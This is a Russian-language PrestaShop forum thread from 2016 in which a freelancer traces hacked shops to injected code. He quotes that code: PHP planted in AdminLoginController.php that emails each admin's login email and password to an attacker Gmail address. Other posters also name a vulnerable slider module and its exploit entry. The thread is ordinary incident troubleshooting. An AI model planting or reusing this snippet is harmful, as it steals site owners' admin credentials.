Автор Тема: Взломан сайт на prestashop  (Прочитано 619 раз)

16 Июль 2016, 16:46:46
  • Фрилансер
  • *
  • Сообщений: 249
  • Репутация: +3/-0
    • Просмотр профиля
Коллеги, кто сталкивался со взломом сайта на prestashop?
У меня несколько сайтов на разных хостингах. Проблема со взомом за последний месяц на всех сайтах. От чего делаю вывод, что хостинг не виноват. В prestashop проблема. Может кто знает как защиться от взлома?
16 Июль 2016, 16:55:05
Ответ #1
  • Ветеран
  • *****
  • Сообщений: 2789
  • Репутация: +65/-4
  • Сообщество PrestaShop
    • Просмотр профиля
С чего решил что сайты взломаны?
Свой комп проверь, может тебя взломали?
16 Июль 2016, 17:07:34
Ответ #2
  • Фрилансер
  • *
  • Сообщений: 249
  • Репутация: +3/-0
    • Просмотр профиля
В google предупреждение, что сайт угражает безопасности. У себя я в первую очередь все проверил.
На один сайт вообще пол-года незаходил, забросил его давно. Так и он взломан.
17 Июль 2016, 11:02:46
Ответ #3
  • Модератор
  • Ветеран
  • *****
  • Сообщений: 86400
  • Репутация: +25417/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Проверьте файл /controllers/admin/AdminLoginController.php.
17 Июль 2016, 12:19:20
Ответ #4
  • Фрилансер
  • *
  • Сообщений: 249
  • Репутация: +3/-0
    • Просмотр профиля
Проверьте файл /controllers/admin/AdminLoginController.php.
Проверил. Там какой-то код
$to = "hooligans3assima@gmail.com";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <bajatax@hacked.com>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);
Я так понимаю все мои пароли уже знают?
17 Июль 2016, 12:29:09
Ответ #5
  • Ветеран
  • *****
  • Сообщений: 2789
  • Репутация: +65/-4
  • Сообщество PrestaShop
    • Просмотр профиля
Я так понимаю все мои пароли уже знают?
Правильно понимешь  :)
Меняй пароли. Нужно все проверить, неизвестно что еще тебе там оставили
17 Июль 2016, 13:01:10
Ответ #6
  • Фрилансер
  • *
  • Сообщений: 249
  • Репутация: +3/-0
    • Просмотр профиля
Я так понимаю все мои пароли уже знают?
Правильно понимешь  :)
Меняй пароли. Нужно все проверить, неизвестно что еще тебе там оставили
Спасибо, обрадовал.
А почему так произошло? Это баг в безопасности prestashop?
17 Июль 2016, 14:04:37
Ответ #7
  • Ветеран
  • *****
  • Сообщений: 2789
  • Репутация: +65/-4
  • Сообщество PrestaShop
    • Просмотр профиля
Не за что, обращайся еще  :)
С prestashop были поблемки, но про AdminLoginController.php еще не слышал.
Логи смотртеть нужно, когда, кто, что менял и т.д.
17 Июль 2016, 19:18:16
Ответ #8
  • Ветеран
  • *****
  • Сообщений: 13716
  • Репутация: +14564/-1
  • Сообщество PrestaShop
    • Просмотр профиля
А почему так произошло? Это баг в безопасности prestashop?
Не в движке проблема, в модулях.
У вас доп. модули установлены? Такие модули как revsliderprestashop, дают возможность взломать ваш сайт. Нужно регулярно обновлять, следить за обнаружением уязвимостей. Так совсем недавно была тема по revsliderprestashop, там писали
Критические замечания по модулю revsliderprestashop
Уязвимости в скриптах (1)
/public_html/modules/revsliderprestashop/inc_php/framework/image_view.class.php - AFU : REVSLIDER : http://www.exploit-db.com/exploits/35385/
17 Июль 2016, 19:19:45
Ответ #9
  • Фрилансер
  • *
  • Сообщений: 249
  • Репутация: +3/-0
    • Просмотр профиля
Adik, я не понял, что с этим делать? Можете подробнее объяснить?
22 Июль 2016, 12:54:33
Ответ #10
  • Ветеран
  • *****
  • Сообщений: 33035
  • Репутация: +26761/-0
    • Просмотр профиля